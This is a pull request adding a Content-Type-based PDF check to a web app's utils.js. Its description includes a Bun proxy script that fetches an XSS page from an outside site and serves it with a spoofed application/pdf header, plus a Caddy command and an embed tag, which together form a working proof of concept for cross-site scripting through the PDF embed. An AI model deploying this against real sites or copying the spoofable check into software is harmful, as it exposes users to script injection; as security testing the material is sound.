### PR TITLE
feat: add PDF URL validation and content type check

### DIFF
--- a/public/js/utils.js
+++ b/public/js/utils.js
@@ -1,3 +1,4 @@
+/* global fetch */
 import base64url from 'base64url'
 
 const uuidRegex = /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i
@@ -44,5 +45,17 @@ export function sanitizeUrl (rawUrl) {
     throw new Error('Invalid protocol')
   } catch (error) {
     return 'about:blank'
+  }
+}
+
+// Check if URL is a PDF based on Content-Type header
+export async function isPdfUrl (url) {
+  try {
+    const response = await fetch(url, { method: 'HEAD' })
+    const contentType = response.headers.get('Content-Type')
+    return contentType === 'application/pdf'
+  } catch (error) {
+    console.warn('Error checking PDF content type:', error)
+    return false
   }
 }


### PR DESCRIPTION
Companion test script

A bun proxy server that serve xss content `https://william957-web.github.io/meow_xss.html`

```javascript
// pdf-proxy.js
const server = Bun.serve({
  port: 5678,
  async fetch(req) {
    // Only handle requests to our proxy endpoint
    const url = new URL(req.url);
    if (url.pathname !== "/proxy-as-pdf.pdf") {
      return new Response("Not Found", { status: 404 });
    }

    try {
      // Fetch the original HTML content
      const response = await fetch("https://william957-web.github.io/meow_xss.html");
      const originalContent = await response.text();

      // Return the HTML content with PDF content type
      return new Response(originalContent, {
        headers: {
          "Content-Type": "application/pdf",
          "Content-Disposition": "inline; filename=document.pdf"
        }
      });
    } catch (error) {
      console.error("Error fetching the content:", error);
      return new Response("Error proxying the content", { status: 500 });
    }
  }
});

console.log(`PDF proxy server running at http://localhost:${server.port}`);
```

And reverse proxy

```bash
caddy reverse-proxy --from local.localhost --to localhost:5678 --internal-certs
```

And embed with:

```markdown
{%pdf https://local.localhost/proxy-as-pdf.pdf %}
```